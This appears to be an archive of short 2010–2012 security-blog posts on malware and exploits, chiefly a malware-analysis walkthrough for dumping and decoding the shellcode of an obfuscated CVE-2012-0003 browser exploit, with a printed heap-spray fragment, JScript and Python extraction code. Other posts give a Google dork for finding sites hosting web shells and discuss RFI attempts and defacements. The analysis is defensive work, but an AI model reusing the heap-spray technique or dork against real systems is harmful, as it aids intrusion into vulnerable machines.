RDP exploit related: MS12-020

Posted in Uncategorized on March 16, 2012 by ianstarkc

1-day vulnerability analysis using DarunGrim

ocean’s InsecLab

Pastie

Rar File

SPYEYE Manual .... F-Secure ... and ...."VISCOLUL" at 10:31 !!

Posted in Uncategorized on March 13, 2012 by ianstarkc

Recently F-Secure posted about the SpyEye manual. It seems that back in 2011 someone helped another person configure SpyEye and linked to this manual. The IRC logs are here. ... b3cfzzw5l

Shellcode of Exploit CVE-2012-0003 (MIDI file ...) from Dadong JSXX 0.41 VIP obfuscated script...

Posted in Uncategorized on January 31, 2012 by ianstarkc

Insert the following code at the "INSERT" location in the original malicious script, and remove the MIDI exploitation code before executing it :)

// Dump the decoded shellcode string to disk for offline analysis.
// OpenTextFile(path, iomode, create): iomode 2 = ForWriting, create = true
// so the file is created if it does not exist (passing true as the iomode
// would open the file for reading and WriteLine would fail).
var fpo = new ActiveXObject("Scripting.FileSystemObject");
var sc = fpo.OpenTextFile("c:\\Shellcode.bin", 2, true);
sc.WriteLine(escape(kpemoez4));
sc.Close();

————————————————————————————
———————————————————————————–

try{alert(a,b,c);}
catch(e)
{
var HrMm7="d";
// pad string is doubled until it reaches half of the requested block size
while(FJWVzIe1.length < aqfvjY5/2) FJWVzIe1 +=FJWVzIe1;
var DmxL8 = FJWVzIe1.substring(0, aqfvjY5/2);
HrMm7="d";
delete FJWVzIe1;

"INSERT"

// kpemoez4 holds the shellcode; 270 copies of pad+pad+shellcode are built here
for(i=0;i<270;i++)
{
NyWLa1[i] = DmxL8+DmxL8+kpemoez4;
}

}

——————————————————————————————-
——————————————————————————————
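Once the dump above has written c:\Shellcode.bin, the analyst still has to turn the escape() text back into raw bytes. The following Python is an added example, not code from the original post: it decodes the %uXXXX/%XX form (each 16-bit code unit sits in memory low byte first) on a constructed sample string and counts the leading NOP sled; SAMPLE_DUMP and the function names are assumptions.

```python
import re

# Constructed sample of what escape(kpemoez4) would write to the dump file.
# The shellcode lives in a JScript string, so each %uXXXX is one 16-bit code
# unit stored little-endian: %u9090 -> 90 90, %uC033 -> 33 C0. Single-byte
# escapes (%41) and characters escape() leaves alone ("abc") also occur.
SAMPLE_DUMP = "%u9090%u9090%uC033%u8B64%u3040abc%41%20"

_TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.S)


def decode_escaped_shellcode(dump: str) -> bytes:
    """Convert a JScript escape() dump back into the bytes it represents."""
    out = bytearray()
    for m in _TOKEN.finditer(dump):
        if m.group(1):                       # %uXXXX: two bytes, low byte first
            unit = int(m.group(1), 16)
            out += bytes((unit & 0xFF, unit >> 8))
        elif m.group(2):                     # %XX: one byte
            out.append(int(m.group(2), 16))
        else:                                # literal left unescaped by escape()
            out.append(ord(m.group(3)) & 0xFF)
    return bytes(out)


def nop_sled_length(blob: bytes, nop: int = 0x90) -> int:
    """Count leading NOP bytes so the real code entry point can be located."""
    n = 0
    while n < len(blob) and blob[n] == nop:
        n += 1
    return n


def dump_to_bin(dump_path: str, out_path: str) -> int:
    """Read the text dump written by WriteLine, emit raw bytes, return length."""
    with open(dump_path, encoding="utf-8", errors="replace") as f:
        raw = decode_escaped_shellcode(f.read().strip())
    with open(out_path, "wb") as f:
        f.write(raw)
    return len(raw)


if __name__ == "__main__":
    raw = decode_escaped_shellcode(SAMPLE_DUMP)
    print(raw.hex(), "leading NOPs:", nop_sled_length(raw))
```

The resulting .bin can be loaded into a disassembler or an emulator at the offset returned by nop_sled_length.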

LOD 0x05

Posted in LOD on February 15, 2010 by ianstarkc

This website will give you all the information about hacked/defaced sites. Recently it exposed the e2 Lab scam (earlier associated with Ankit Fadia .. LOL and Double LOL :)

LOD 0x04

Posted in LOD on February 14, 2010 by ianstarkc

If you analyze the web logs of the National Software Reference Library, supported by the National Institute of Standards and Technology (NIST), US, especially under "Technical Information -> Missing Files", you will see lots of RFI (Remote File Inclusion) exploit attempts. All these files contain the strings explained by SANS Storm Center. You know how websites get hacked? Here is a sample hacked site. More hacked sites can be found using this Google dork: "intitle:FaTaLisTiCz_Fx Fx29SheLL". You can also analyse these web logs and, most importantly, your own web logs!! So what do you think about FeeLCoMz?

LOD 0x03

Posted in LOD on February 6, 2010 by ianstarkc

Websites defaced by R3YR3 !!

http://www.paidantivirus.com

http://www.viruseliminate.com

Both websites are owned by the same person (who has taken a WHOIS privacy service).

R3YR3 is a member of an Indonesian defacers group. It seems another member of the same group, Flyff666, is responsible for the Win32.Sality.aa virus as detected by Kaspersky; he has either given it different names himself, like W32.Sarap.B or W32.Amburadul.Virus, or has taken code from them. Infected files are here, and I think this web server itself is infected. (The files have double extensions; this virus infects image file formats like JPG, GIF, PNG etc.)

LOD 0x02

Posted in LOD on February 4, 2010 by ianstarkc

Bootloader Development Environment

Creating a bootloader from scratch
